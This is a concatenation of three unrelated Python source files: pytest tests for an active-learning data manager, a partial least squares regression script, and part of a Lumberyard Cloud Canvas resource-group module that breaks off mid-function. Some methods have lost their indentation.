    manager = get_classification_dataset(50)
    expected = (
        "GenericDataManager\nTraining set size: 400\n"
        "Labelled: 50, Unlabelled: 350\nPercentage Labelled: 0.125"
    )
    assert repr(manager) == "GenericDataManager"
    assert str(manager) == expected
def test_get_train_set():
    """The train set covers all 400 training samples."""
    train_set = get_classification_dataset(50).get_train_set()
    assert len(train_set) == 400
def test_update_train_labels():
    """Labelling an unlabelled index moves it between the two pools."""
    manager = get_classification_dataset(50)
    candidate = manager.u_indices[0]
    labelled_before = len(manager.l_indices)
    unlabelled_before = len(manager.u_indices)
    manager.update_train_labels([candidate])
    assert candidate in manager.l_indices
    assert len(manager.l_indices) > labelled_before
    assert len(manager.u_indices) < unlabelled_before
def test_percentage_labelled():
    """The default split labels roughly 10% of the data."""
    manager = get_classification_dataset()
    assert manager.percentage_labelled() == pytest.approx(0.1, 0.05)
def test_get_dataset_size():
    """len() of the manager equals the underlying dataset size."""
    manager = get_classification_dataset()
    assert len(manager) == 569
def test_resolving_dataset_indices():
    """Testing different user inputs to dataset split indices"""
    dataset = DiabetesDataset()
    _, valid_ds, test_ds = torch.utils.data.random_split(dataset, [350, 50, 42])

    # Case 5: only validation indices supplied raises an error
    with pytest.raises(ValueError) as case5:
        GenericDataManager(
            dataset,
            validation_indices=valid_ds.indices,
            loader_batch_size=10,
        )
    assert str(case5.value) == "No train or test specified, too ambigious to set values"

    # Case 6: only test indices supplied raises an error
    with pytest.raises(ValueError) as case6:
        GenericDataManager(
            dataset,
            test_indices=test_ds.indices,
            loader_batch_size=10,
        )
    assert str(case6.value) == "No train or validation specified, too ambigious to set values"
    # TODO HANDLE OTHER CASES
def test_empty_train_set():
    """Testing that we throw an error when we produce a datamanager with
    an empty train set
    """
    dataset = DiabetesDataset()

    # Case 1: user explicitly passes an empty train split
    train_ds, valid_ds, test_ds = torch.utils.data.random_split(dataset, [0, 400, 42])
    with pytest.raises(ValueError) as e_info:
        GenericDataManager(
            dataset,
            train_indices=train_ds.indices,
            validation_indices=valid_ds.indices,
            test_indices=test_ds.indices,
            loader_batch_size=10,
        )
    assert str(e_info.value) == "The train set is empty"

    # Case 2: empty train set produced by resolving of indices
    _, valid_ds, test_ds = torch.utils.data.random_split(dataset, [0, 400, 42])
    with pytest.raises(ValueError) as e_info:
        GenericDataManager(
            dataset,
            validation_indices=valid_ds.indices,
            test_indices=test_ds.indices,
            loader_batch_size=10,
        )
    assert str(e_info.value) == "The train set is empty"
def test_resolving_dataset_check_split_leaks():
    """Check we throw an error for data split leaks"""
    dataset = DiabetesDataset()
    train_ds, valid_ds, _ = torch.utils.data.random_split(dataset, [350, 50, 42])
    leaked_test_indices = valid_ds.indices  # deliberate overlap with validation
    with pytest.raises(ValueError) as e_info:
        GenericDataManager(
            dataset,
            train_indices=train_ds.indices,
            validation_indices=valid_ds.indices,
            test_indices=leaked_test_indices,
            loader_batch_size=10,
        )
    assert str(e_info.value) == "There is overlap between the split indices supplied"
|
<reponame>cdek11/PLS
# coding: utf-8
# In[ ]:
# Code to implement the initial version of the PLS Algorithm
import pandas as pd
import numpy as np
def _load_scaled(path, columns, response):
    """Read the csv at *path*, keep *columns*, and autoscale every column.

    Returns:
        (frame, response_std): the centered/unit-variance DataFrame and the
        response column's ORIGINAL standard deviation, used later to rescale
        RMSE back to real units.
    """
    # pd.read_csv(..., index_col=0) replaces the removed DataFrame.from_csv
    frame = pd.read_csv(path, index_col=0)
    frame = frame[columns]
    response_std = frame[response].std()
    frame = frame - frame.mean()       # center each column
    frame = frame / frame.std()        # scale each column to unit variance
    return frame, response_std


def pls(path, path_test, predictors, response):
    '''Run PLS1 (single response) regression on numeric predictors.

    Args:
        path: csv file with the training data (first column is the index).
        path_test: csv file with the test data (same layout).
        predictors: list of predictor column names (left unmodified).
        response: name of the numeric response column.

    Returns:
        (RMSE_dictionary, RMSE_test_dictionary): per-component-count train and
        test RMSE, scaled back to the response's original units.

    Fixes vs the original implementation:
      * X_test/Y_test were built from the TRAINING frame (`data`), so the
        "test" RMSE was really a training RMSE; they now use `data_test`.
      * pd.DataFrame.from_csv / .as_matrix were removed from pandas; replaced
        with pd.read_csv / .values.
      * The caller's `predictors` list was aliased and mutated; a copy is
        used instead, and the test csv is loaded once instead of per
        component.
    '''
    # work on a copy so the caller's list is never mutated
    columns = list(predictors) + [response]

    ### Data preparation
    data, response_std = _load_scaled(path, columns, response)
    data_test, response_std_test = _load_scaled(path_test, columns, response)

    X = data[predictors].values            # design matrix (X block)
    Y = data[[response]].values            # response column vector (Y block)
    Y_true = Y                             # keep unscathed copy for prediction

    # BUG FIX: these previously read from `data` (the training frame)
    X_test = data_test[predictors].values
    Y_test = data_test[[response]].values
    Y_true_test = Y_test

    # rank bounds the number of PLS components the model can have
    rank = np.linalg.matrix_rank(X)

    ### PLS algorithm
    Xres_dictionary = {}        # X-block residuals per component
    Yres_dictionary = {}        # Y-block residuals per component
    q_new_dictionary = {}       # Y-block loadings per component
    b_dictionary = {}           # inner-relation regression coefficients
    t_hat_dictionary = {}       # estimated X scores
    t_hat_train_dictionary = {} # X scores for training predictions
    t_hat_test_dictionary = {}  # X scores for test predictions
    RMSE_dictionary = {}        # training RMSE per component count
    RMSE_test_dictionary = {}   # test RMSE per component count

    for i in range(1, rank + 1):
        Y_pred = np.zeros((Y_true.shape[0], 1))
        # single response column, so q = 1 and convergence iteration (step 8)
        # can be omitted
        q = 1
        u = Y                                                 # Step 1
        w_old = np.dot(u.T, X) / np.dot(u.T, u)               # Step 2
        w_new = w_old / np.linalg.norm(w_old)                 # Step 3
        t = np.dot(X, w_new.T) / np.dot(w_new, w_new.T)       # Step 4
        q_old = np.dot(t.T, Y) / np.dot(t.T, t)               # Step 5
        q_new = q_old / np.linalg.norm(q_old)                 # Step 6
        q_new_dictionary[i] = q_new
        u = np.dot(Y, q_new.T) / np.dot(q_new, q_new.T)       # Step 7
        # Step 8 (convergence check) skipped: closed form for PLS1
        p = np.dot(t.T, X) / np.dot(t.T, t)                   # Step 9
        p_new = p.T / np.linalg.norm(p.T)                     # Step 10
        t_new = t / np.linalg.norm(p.T)                       # Step 11
        w_new = w_old / np.linalg.norm(p)                     # Step 12
        b = np.dot(u.T, t_new) / np.dot(t.T, t)               # Step 13
        b_dictionary[i] = b

        # residuals (deflation of both blocks)
        E_h = X - np.dot(t_new, p_new.T)
        F_h = Y - b.dot(t_new.T).T.dot(q)
        Xres_dictionary[i] = E_h
        X = E_h
        Yres_dictionary[i] = F_h
        Y = F_h

        # estimated scores for the deflated X block
        t_hat = np.dot(E_h, w_new.T)
        t_hat_dictionary[i] = t_hat
        E_h = E_h - np.dot(t_hat, p_new.T)

        # training prediction: accumulate over components fitted so far
        E_h = X
        for j in range(1, i + 1):
            t_hat_train = np.dot(E_h, w_new.T)
            t_hat_train_dictionary[j] = t_hat_train
            E_h = E_h - np.dot(t_hat_train, p_new.T)
        for g in range(1, i + 1):
            Y_pred = Y_pred + (b_dictionary[g] * t_hat_dictionary[g]).dot(q_new_dictionary[g].T)

        # training RMSE, rescaled to the response's original units
        RMSE = np.sqrt(sum((Y_true - Y_pred) ** 2) / Y_true.shape[0])
        RMSE_dictionary[i] = RMSE * response_std

        # test prediction over the same number of components
        Y_pred_test = np.zeros((Y_true_test.shape[0], 1))
        E_h_test = X_test
        for k in range(1, i + 1):
            t_hat_test = np.dot(E_h_test, w_new.T)
            t_hat_test_dictionary[k] = t_hat_test
            E_h_test = E_h_test - np.dot(t_hat_test, p_new.T)
            Y_pred_test = Y_pred_test + (b_dictionary[k] * t_hat_test_dictionary[k]).dot(q_new_dictionary[k].T)

        # test RMSE, rescaled with the TEST response's standard deviation
        RMSE_test = np.sqrt(sum((Y_true_test - Y_pred_test) ** 2) / Y_true_test.shape[0])
        RMSE_test_dictionary[i] = RMSE_test * response_std_test

    return RMSE_dictionary, RMSE_test_dictionary
|
<reponame>kostenickj/lumberyard
#
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# $Revision: #1 $
from errors import HandledError
import os
import util
import json
import copy
from resource_manager_common import constant,service_interface
from config import ResourceTemplateAggregator
import time
import file_util
import mappings
import project
import security
import common_code
from deployment_tags import DeploymentTag
from botocore.exceptions import NoCredentialsError
from uploader import ProjectUploader, ResourceGroupUploader, Phase
class ResourceGroup(object):
    '''Represents one Cloud Canvas resource group (optionally provided by a
    gem) and the template, settings and code paths that back it.'''

    def __init__(self, context, resource_group_name, directory_path, cpp_base_directory_path, cpp_aws_directory_path, gem = None):
        '''Initialize an ResourceGroup object.'''
        self.__context = context
        self.__name = resource_group_name
        self.__directory_path = directory_path
        self.__cpp_aws_directory_path = cpp_aws_directory_path
        self.__cpp_base_directory_path = cpp_base_directory_path
        # gem is None for resource groups that are not provided by a gem
        self.__gem = gem
        self.__template_path = os.path.join(self.__directory_path, constant.RESOURCE_GROUP_TEMPLATE_FILENAME)
        # the template and both settings files are loaded lazily; None means
        # "not loaded yet"
        self.__template = None
        self.__cli_plugin_code_path = os.path.join(self.__directory_path, 'cli-plugin-code')
        self.__cgp_code_path = os.path.join(self.__directory_path, constant.GEM_CGP_DIRECTORY_NAME)
        self.__base_settings_file_path = os.path.join(self.__directory_path, constant.RESOURCE_GROUP_SETTINGS)
        # per-game-project extension directory for this group
        self.__game_project_extensions_path = os.path.join(self.__context.config.game_directory_path, 'AWS', 'resource-group', self.__name)
        self.__game_settings_file_path = os.path.join(self.__game_project_extensions_path, constant.RESOURCE_GROUP_SETTINGS)
        self.__base_settings = None
        self.__game_settings = None
    @property
    def name(self):
        '''The resource group's name.'''
        return self.__name

    @property
    def is_enabled(self):
        '''True unless the group is listed under the project's disabled
        resource groups key in local_project_settings.'''
        return self.name not in self.__context.config.local_project_settings.get(constant.DISABLED_RESOURCE_GROUPS_KEY, [])
def enable(self):
if not self.is_enabled:
list = self.__context.config.local_project_settings.setdefault(constant.DISABLED_RESOURCE_GROUPS_KEY, [])
if self.name in list:
list.remove(self.name)
self.__context.config.local_project_settings.save()
def disable(self):
if self.is_enabled:
list = self.__context.config.local_project_settings.setdefault(constant.DISABLED_RESOURCE_GROUPS_KEY, [])
if self.name not in list:
list.append(self.name)
self.__context.config.local_project_settings.save()
    @property
    def directory_path(self):
        '''Path of the resource group's directory (as given at construction).'''
        return self.__directory_path

    @property
    def cpp_aws_directory_path(self):
        '''The cpp_aws_directory_path provided at construction.'''
        return self.__cpp_aws_directory_path

    @property
    def cpp_base_directory_path(self):
        '''The cpp_base_directory_path provided at construction.'''
        return self.__cpp_base_directory_path

    @property
    def is_gem(self):
        '''True when this resource group is provided by a gem.'''
        return self.__gem is not None

    @property
    def gem(self):
        '''The providing gem object, or None if not gem based.'''
        return self.__gem
def verify_gem_enabled(self):
if self.gem:
if not self.gem.is_defined:
raise HandledError('The resource group {resource_group_name} relies on a gem from {gem_path} which does not exist.'.format(
resource_group_name = self.name,
gem_path = self.gem.root_directory_path))
if not self.gem.is_enabled:
raise HandledError('The resource group {resource_group_name} relies on gem {gem_name} version {gem_version} (from {gem_path}) which is not enabled for the project. Please enable the gem {gem_name} in the project configurator.'.format(
resource_group_name = self.name,
gem_name = self.gem.name,
gem_version = self.gem.version,
gem_path = self.gem.root_directory_path))
    @property
    def template_path(self):
        '''Path of the group's template file (directory_path joined with
        constant.RESOURCE_GROUP_TEMPLATE_FILENAME).'''
        return self.__template_path

    @property
    def template(self):
        '''The aggregated template dict for this group, combining the group
        directory with the game project extensions; loaded lazily and cached.'''
        if self.__template is None:
            self.__template = ResourceTemplateAggregator(self.__context, self.__directory_path, self.__game_project_extensions_path).effective_template
        return self.__template
    def effective_template(self, deployment_name):
        '''Apply *deployment_name*'s DeploymentTag overrides for this group.'''
        # NOTE(review): `template` is assigned (forcing the lazy load/cache of
        # self.template) but apply_overrides is passed the group itself, not
        # the template — confirm apply_overrides expects the resource group.
        template = self.template
        tags = DeploymentTag(deployment_name, self.__context)
        return tags.apply_overrides(self)
def get_inter_gem_dependencies(self):
dependencies = []
for resource_name, definition in self.template.get("Resources", {}).iteritems():
if not definition["Type"] == "Custom::LambdaConfiguration":
continue
services = definition.get("Properties", {}).get("Services", [])
for service in services:
target_gem_name, target_interface_name, target_interface_version = service_interface.parse_interface_id(service["InterfaceId"])
dependencies.append({
"gem": target_gem_name,
"id": service["InterfaceId"],
"function": definition.get("Properties", {}).get("FunctionName", "")
})
return dependencies
def get_template_with_parameters(self, deployment_name):
resource_group_template = self.effective_template(deployment_name)
# override default parameter values if a deployment is speciified
if deployment_name:
project_settings = self.__context.config.project_settings
default_resource_group_settings = project_settings.get_default_resource_group_settings()
resource_group_settings = project_settings.get_resource_group_settings(deployment_name)
resource_group_default_parameters = self.__find_setting(default_resource_group_settings, self.name, 'parameter')
resource_group_parameters = self.__find_setting(resource_group_settings, self.name, 'parameter')
if 'Parameters' in resource_group_template:
resource_group_template_parameters = resource_group_template['Parameters']
for paramName, paramValue in resource_group_template_parameters.iteritems():
newParamValue = self.__find_setting(resource_group_parameters, paramName)
if newParamValue == None:
newParamValue = self.__find_setting(resource_group_default_parameters, paramName)
if newParamValue != None:
resource_group_template_parameters[paramName]['Default'] = newParamValue
return resource_group_template
def __find_setting(self, dictionary, *levels):
if dictionary == None:
return None
current = dictionary
for level in levels:
if level in current:
current = current[level]
else:
return None
return current
    def save_template(self):
        '''Write the in-memory template back to template_path as JSON.'''
        self.__context.config.save_json(self.template_path, self.template)

    @property
    def cli_plugin_code_path(self):
        '''Path of the group's 'cli-plugin-code' subdirectory.'''
        return self.__cli_plugin_code_path

    @property
    def cgp_code_path(self):
        '''Path of the group's CGP code directory (constant.GEM_CGP_DIRECTORY_NAME).'''
        return self.__cgp_code_path
def update_cgp_code(self, resource_group_uploader):
content_path = os.path.join(self.cgp_code_path, "dist")
if not os.path.isdir(content_path):
return
resource_group_uploader.upload_dir(None, content_path, alternate_root=constant.GEM_CGP_DIRECTORY_NAME, suffix='dist')
    @property
    def base_settings_file_path(self):
        '''Path of the settings file in the group's own directory.'''
        return self.__base_settings_file_path

    @property
    def game_settings_file_path(self):
        '''Path of the settings file in the game project extensions directory.'''
        return self.__game_settings_file_path

    def get_stack_id(self, deployment_name, optional = False):
        '''Delegate to config.get_resource_group_stack_id for this group;
        *optional* is forwarded unchanged.'''
        return self.__context.config.get_resource_group_stack_id(deployment_name, self.name, optional = optional)
def get_stack_parameters(self, deployment_name, uploader = None):
if deployment_name:
deployment_stack_arn = self.__context.config.get_deployment_stack_id(deployment_name, optional = True)
else:
deployment_stack_arn = None
return {
'ConfigurationBucket' : uploader.bucket if uploader else None,
'ConfigurationKey': uploader.key if uploader else None,
'ProjectResourceHandler': self.__context.config.project_resource_handler_id if self.__context.config.project_initialized else None,
'DeploymentStackArn': deployment_stack_arn,
'DeploymentName': deployment_name,
'ResourceGroupName': self.name
}
    def get_pending_resource_status(self, deployment_name):
        '''Ask the stack context for the pending status of this group's
        resources, supplying the current template, parameters and content
        paths so changes can be detected.'''
        if deployment_name:
            resource_group_stack_id = self.get_stack_id(deployment_name, optional = True)
        else:
            resource_group_stack_id = None
        template = self.get_template_with_parameters(deployment_name)
        parameters = self.get_stack_parameters(deployment_name, uploader = None)
        # collect every lambda function's code directories so content changes
        # can be detected
        lambda_function_content_paths = []
        resources = self.template["Resources"]
        for name, description in resources.iteritems():
            if not description["Type"] == "AWS::Lambda::Function":
                continue
            code_path, imported_paths, multi_imports = ResourceGroupUploader.get_lambda_function_code_paths(self.__context, self.name, name)
            lambda_function_content_paths.append(code_path)
            lambda_function_content_paths.extend(imported_paths)
        # TODO: need to support swagger.json IN the lambda directory.
        service_api_content_paths = [ os.path.join(self.directory_path, 'swagger.json') ]
        # TODO: get_pending_resource_status's new_content_paths parameter needs to support
        # a per-resource mapping instead of an per-type mapping. As is, a change in any lambda
        # directory makes all lambdas look like they need to be updated.
        return self.__context.stack.get_pending_resource_status(
            resource_group_stack_id,
            new_template = template,
            new_parameter_values = parameters,
            new_content_paths = {
                'AWS::Lambda::Function': lambda_function_content_paths,
                'Custom::ServiceApi': service_api_content_paths
            },
            is_enabled = self.is_enabled
        )
def add_output(self, logical_id, description, value, force=False):
'''Adds an output to a resource group's resource-template.json file.
Args:
logical_id: the name of the output
description: a description of the output
value: the output value. May be of the form { "Ref": "..." } or
{ "Gn::GetAtt": [ "...", "..." ] } or any other construct allowed
by Cloud Formation.
force (named): Determine if existing definitions are replaced. Default
is False.
Returns:
True if a change was made.
'''
changed = False
outputs = util.dict_get_or_add(self.template, 'Outputs', {})
if logical_id not in outputs or force:
self.__context.view.adding_output(self.template_path, logical_id)
outputs[logical_id] = {
'Description': description,
'Value': value
}
changed = True
else:
self.__context.view.output_exists(self.template_path, logical_id)
return changed
def remove_output(self, logical_id):
'''Removes an output to a resource group's resource-template.json file.
Args:
logical_id: the name of the output
Returns:
True if a change was made.
'''
changed = False
outputs = util.dict_get_or_add(self.template, 'Outputs', {})
if logical_id in outputs:
self.__context.view.removing_output(self.template_path, logical_id)
del outputs[logical_id]
changed = True
else:
self.__context.view.output_not_found(self.template_path, logical_id)
return changed
    def add_resources(self, resource_definitions, force=False, dependencies=None):
        '''Adds resource definitions to a resource group's resource-template.json file.

        Args:
            resource_definitions: dictionary containing resource definitions.
            force (named): indicates if resource and parameter definitions replace existing definitions. Default is False.
            dependencies (named): a dictionary that provides updates to the DepondsOn property of existing resources:
                {
                    '<dependent-resource-name>': [ '<dependency-resource-name>', ... ],
                    ...
                }
                resutls in:
                "<dependent-resource-name>": {
                    "DependsOn": [ "<dependency-resource-name>" ]
                    ...
                }

        Returns:
            True if any definitions were added.
        '''
        changed = False
        if dependencies is None:
            dependencies = {}
        resources = util.dict_get_or_add(self.template, 'Resources', {})
        for resource_name, resource_definition in resource_definitions.iteritems():
            if resource_name in resources and not force:
                self.__context.view.resource_exists(self.template_path, resource_name)
            else:
                self.__context.view.adding_resource(self.template_path, resource_name)
                resources[resource_name] = resource_definition
                # resources carrying Permissions/RoleMappings metadata are
                # registered as dependencies of the AccessControl resource
                if self.__has_access_control_metadata(resource_definition):
                    dependency_list = dependencies.setdefault('AccessControl', [])
                    dependency_list.append(resource_name)
                changed = True
        if dependencies:
            for dependent_name, dependency_list in dependencies.iteritems():
                if dependent_name == 'AccessControl':
                    # an AccessControl resource is created on demand
                    dependent_definition = resources.setdefault('AccessControl', security.DEFAULT_ACCESS_CONTROL_RESOURCE_DEFINITION)
                else:
                    dependent_definition = resources.get(dependent_name)
                    if dependent_definition is None:
                        raise ValueError('The dependent resource {} does not exist.'.format(dependent_name))
                # NOTE(review): `dependencies` is rebound here to the DependsOn
                # list; the iteration over the original dict is unaffected, but
                # the shadowing makes this loop easy to misread.
                dependencies = dependent_definition.setdefault('DependsOn', [])
                if not isinstance(dependencies, type([])):
                    # normalize a scalar DependsOn into a list
                    dependencies = [ dependencies ]
                    dependent_definition['DependsOn'] = dependencies
                if not isinstance(dependency_list, type([])):
                    dependency_list = [ dependency_list ]
                dependencies.extend(set(dependency_list))
        return changed
def __has_access_control_metadata(self, resource_definition):
return util.get_cloud_canvas_metadata(resource_definition, 'Permissions') or util.get_cloud_canvas_metadata(resource_definition, 'RoleMappings')
def remove_resources(self, resource_names):
'''Removes resource definitions from a resource group's resource-template.json file.
Args:
resource_names: list containing resource names.
Returns:
True if any definitions were removed.
'''
changed = False
resources = util.dict_get_or_add(self.template, 'Resources', {})
for resource_name in resource_names:
if resource_name not in resources:
self.__context.view.resource_not_found(self.template_path, resource_name)
else:
self.__context.view.removing_resource(self.template_path, resource_name)
del resources[resource_name]
changed = True
for resource_definition in resources.values():
depends_on = resource_definition.get('DependsOn')
if depends_on:
if isinstance(depends_on, type([])):
for resource_name in resource_names:
while resource_name in depends_on:
depends_on.remove(resource_name)
changed = True
else:
if depends_on in resource_names:
resource_definition['DependsOn'] = []
changed = True
return changed
def add_parameters(self, parameter_definitions, force=False):
'''Adds resource and parameter definitions to a resource group's resource-template.json file.
Args:
parameter_definitions: dictionary containing parameter definitions.
force (named): indicates if resource and parameter definitions replace existing definitions. Default is False.
Returns:
True if any definitions were added.
'''
changed = False
parameters = util.dict_get_or_add(self.template, 'Parameters', {})
for parameter_name, parameter_definition in parameter_definitions.iteritems():
if parameter_name in parameters and not force:
self.__context.view.parameter_exists(self.template_path, parameter_name)
else:
self.__context.view.adding_parameter(self.template_path, parameter_name)
parameters[parameter_name] = parameter_definition
changed = True
return changed
def remove_parameters(self, parameter_names):
'''Removes resource and parameter definitions from a resource group's resource-template.json file.
Args:
parameter_names: list containing parameter names.
Returns:
True if any definitions were removed.
'''
changed = False
parameters = util.dict_get_or_add(self.template, 'Parameters', {})
for parameter_name in parameter_names:
if parameter_name not in parameters:
self.__context.view.parameter_not_found(self.template_path, parameter_name)
else:
self.__context.view.removing_parameter(self.template_path, parameter_name)
del parameters[parameter_name]
changed = True
return changed
def copy_directory(self, source_path, relative_destination_path = '.', force=False):
'''Adds a copy of the contents of a directory to a resource group. Subdirectories are recursively merged.
Arguments:
source_path: the directory to copy.
relative_destination_path (named): the name of the resource group relative directory
where the source directory contents will be copied. Defaults to the resource group
directory itself.
force (named): if True, overwrite destination files that already exists.
The default is False.
'''
destination_path = os.path.abspath(os.path.join(self.directory_path, relative_destination_path))
file_util.copy_directory_content(self.__context, destination_path, source_path, overwrite_existing = force)
def copy_file(self, source_path, relative_destination_path, force=False):
'''Adds a copy of a file to a resource group.
Arguments:
source_path - path and name of the file to copy.
relative_destination_path - path and name of the destination file, relative to the
resource group directory.
force (named) - if True, existing files will be overwitten. Default is False.
'''
destination_path = os.path.abspath(os.path.join(self.directory_path, relative_destination_path))
file_util.copy_file(self.__context, destination_path, source_path, everwrite_existing = force)
def create_file(self, relative_destination_path, initial_content, force=False):
    '''Creates a file in a resource group.

    Args:
        relative_destination_path: the path and name of the file relative to
            the resource group directory.
        initial_content: The file's initial content.
        force (named): Overwrite existing files. Default is False.

    Returns:
        True if the file was created.
    '''
    destination_path = os.path.join(self.directory_path, relative_destination_path)
    # Fixed: previously called file_util.create_ignore_filter_function, which does not
    # match the documented "create a file" behavior or this argument list; the sibling
    # copy helpers in this class all delegate to the corresponding file_util function.
    return file_util.create_file(self.__context, destination_path, initial_content, overwrite_existing = force)
def get_base_settings(self):
    '''Returns the base settings JSON, loading and caching it on first access.'''
    settings = self.__base_settings
    if settings is None:
        settings = self.__context.config.load_json(self.__base_settings_file_path)
        self.__base_settings = settings
    return settings
def add_aggregate_settings(self, context):
    '''Publishes this group's base settings under its name in context.config.aggregate_settings.

    Does nothing when aggregation is disabled (aggregate_settings is None) or when the
    group has no base settings data.
    '''
    # Fixed idiom: compare against None with "is not", not "!=" (PEP 8).
    if context.config.aggregate_settings is not None:
        settings_data = self.get_base_settings()
        if settings_data:
            context.config.aggregate_settings[self.name] = settings_data
def get_game_settings(self):
    '''Returns the game settings JSON, loading and caching it on first access.'''
    settings = self.__game_settings
    if settings is None:
        settings = self.__context.config.load_json(self.__game_settings_file_path)
        self.__game_settings = settings
    return settings
def get_editor_setting(self, setting_name, preference = 'game_or_base'):
    '''Looks up an editor setting in the game and/or base settings.

    Args:
        setting_name: the setting to look up.
        preference: search order; one of 'game_or_base' (default), 'base_or_game',
            'base', or 'game'. Any other value yields None.

    Returns:
        The first non-None value found in the chosen search order, or None.
    '''
    base_settings = self.get_base_settings()
    game_settings = self.get_game_settings()
    # Map each preference to the ordered list of settings dicts to consult.
    search_order = {
        'game_or_base': (game_settings, base_settings),
        'base_or_game': (base_settings, game_settings),
        'base': (base_settings,),
        'game': (game_settings,)
    }.get(preference, ())
    for settings in search_order:
        value = settings.get(setting_name)
        if value is not None:
            return value
    return None
def enable(context, args):
    '''Enables a currently disabled resource group and reports the change to the view.

    Raises:
        HandledError: if the group is already enabled.
    '''
    group = context.resource_groups.get(args.resource_group)
    if group.is_enabled:
        message = 'The {} resource group is not disabled.'.format(group.name)
        raise HandledError(message)
    # The local project settings file is modified, so verify it is writable first.
    writable_paths = [context.config.local_project_settings.path]
    util.validate_writable_list(context, writable_paths)
    group.enable()
    context.view.resource_group_enabled(group.name)
def disable(context, args):
    '''Disables a currently enabled resource group and reports the change to the view.

    Raises:
        HandledError: if the group is not enabled.
    '''
    group = context.resource_groups.get(args.resource_group)
    if not group.is_enabled:
        message = 'The {} resource group is not enabled.'.format(group.name)
        raise HandledError(message)
    # The local project settings file is modified, so verify it is writable first.
    writable_paths = [context.config.local_project_settings.path]
    util.validate_writable_list(context, writable_paths)
    group.disable()
    context.view.resource_group_disabled(group.name)
def add(context, args):
    '''Deprecated "resource-group add" command.

    The old behavior (project-local resource group directories) was deprecated in
    Lumberyard 1.11 (CGF 1.1.1); "cloud-gem create" or "cloud-gem enable" should be
    used instead. This approximates the old behavior by either re-enabling a disabled
    group or creating a new asset-only gem.
    '''
    if not args.is_gui:
        context.view.using_deprecated_command('resource-group add', ['cloud-gem create', 'cloud-gem enable'])
    group_name = args.resource_group
    disabled_groups = context.config.local_project_settings.get(constant.DISABLED_RESOURCE_GROUPS_KEY, [])
    if group_name in disabled_groups:
        # The group already exists but is disabled; just re-enable it.
        enable(context, util.Args(resource_group = group_name))
        return
    # Otherwise create a brand new asset-only gem for the group.
    if args.include_example_resources:
        content = 'api-lambda-dynamodb'
    else:
        content = 'no-resources'
    context.gem.create_gem(
        gem_name = group_name,
        initial_content = content,
        enable = True,
        asset_only = True)
def remove(context, args):
    '''Deprecated "resource-group remove" command (since Lumberyard 1.11 / CGF 1.1.1).

    Disables the gem backing the group, or falls back to disabling the group directly.
    '''
    if not args.is_gui:
        context.view.using_deprecated_command('resource-group remove', 'cloud-gem disable')
    target = context.resource_groups.get(args.resource_group)
    if not target.is_gem:
        disable(context, args)
        return
    context.gem.disable_gem(gem_name = args.resource_group)
def update_stack(context, args):
    '''Updates the CloudFormation stack for a single resource group within a deployment.

    Args:
        context: the resource manager context.
        args: parsed command line args; uses args.deployment and args.resource_group.

    Raises:
        HandledError: if no deployment was specified and no default deployment is set.
    '''
    deployment_name = args.deployment
    resource_group_name = args.resource_group

    # Use default deployment if necessary
    if deployment_name is None:
        if context.config.default_deployment is None:
            raise HandledError('No default deployment has been set. Provide the --deployment parameter or use the default-deployment command to set a default deployment.')
        deployment_name = context.config.default_deployment

    # Get needed data, verifies the resource group stack exists
    resource_group = context.resource_groups.get(resource_group_name)
    resource_group_stack_id = resource_group.get_stack_id(deployment_name)
    pending_resource_status = resource_group.get_pending_resource_status(deployment_name)

    # Is it ok to do this?
    capabilities = context.stack.confirm_stack_operation(
        resource_group_stack_id,
        'deployment {} resource group {}'.format(deployment_name, resource_group_name),
        args,
        pending_resource_status
    )

    # Update the stack...
    project_uploader = ProjectUploader(context)
    deployment_uploader = project_uploader.get_deployment_uploader(deployment_name)

    # before_update uploads the processed template and lambda code and runs the
    # pre-update hooks; it returns the uploader and the S3 url of the template.
    resource_group_uploader, resource_group_template_url = before_update(
        deployment_uploader,
        resource_group_name
    )

    parameters = resource_group.get_stack_parameters(
        deployment_name,
        uploader = resource_group_uploader
    )

    # wait a bit for S3 to help insure that templates can be read by cloud formation
    time.sleep(constant.STACK_UPDATE_DELAY_TIME)

    context.stack.update(
        resource_group_stack_id,
        resource_group_template_url,
        parameters = parameters,
        pending_resource_status = pending_resource_status,
        capabilities = capabilities
    )

    # Upload CGP content and run the post-update hooks.
    after_update(deployment_uploader, resource_group_name)

    # Deprecated in 1.9 - TODO remove
    context.hooks.call_module_handlers('cli-plugin-code/resource_group_hooks.py', 'on_post_update',
        args=[deployment_name, resource_group_name],
        deprecated=True
    )
def create_stack(context, args):
    '''Creates the CloudFormation stack for a resource group via a deployment stack update.

    Does a "safe" create of a resource group stack. The existing deployment
    template is modified to add the stack and config resources and used
    to update the deployment stack. This prevents unexpected changes to other
    resource groups as a side effect of the deployment update.
    '''
    resource_group = context.resource_groups.get(args.resource_group)
    pending_resource_status = resource_group.get_pending_resource_status(args.deployment)

    # Is it ok to do this?
    capabilities = context.stack.confirm_stack_operation(
        None, # stack id
        'deployment {} resource group {}'.format(args.deployment, args.resource_group),
        args,
        pending_resource_status
    )

    # Do the create...
    project_uploader = ProjectUploader(context)
    deployment_uploader = project_uploader.get_deployment_uploader(args.deployment)

    # Upload the resource group's processed template and lambda code.
    before_update(
        deployment_uploader,
        args.resource_group
    )

    context.view.processing_template('{} deployment'.format(args.deployment))

    deployment_stack_id = context.config.get_deployment_stack_id(args.deployment)
    deployment_template = context.stack.get_current_template(deployment_stack_id)
    deployment_parameters = context.stack.get_current_parameters(deployment_stack_id)
    deployment_resources = deployment_template.get('Resources', {})

    # The "effective" template holds the definitions that should exist for this
    # group; copy them into the currently deployed template where missing.
    effective_deployment_resources = context.config.deployment_template_aggregator.effective_template.get('Resources',{})

    resource_group_stack_resource = deployment_resources.get(args.resource_group, None)
    if resource_group_stack_resource is None:
        resource_group_stack_resource = copy.deepcopy(effective_deployment_resources.get(args.resource_group, {}))
        deployment_resources[args.resource_group] = resource_group_stack_resource

    resource_group_config_name = args.resource_group + 'Configuration'
    resource_group_config_resource = deployment_resources.get(resource_group_config_name, None)
    if resource_group_config_resource is None:
        resource_group_config_resource = copy.deepcopy(effective_deployment_resources.get(resource_group_config_name, {}))
    # Point the configuration resource at the content uploaded for this update.
    resource_group_config_resource.get('Properties', {})['ConfigurationKey'] = deployment_uploader.key
    deployment_resources[resource_group_config_name] = resource_group_config_resource

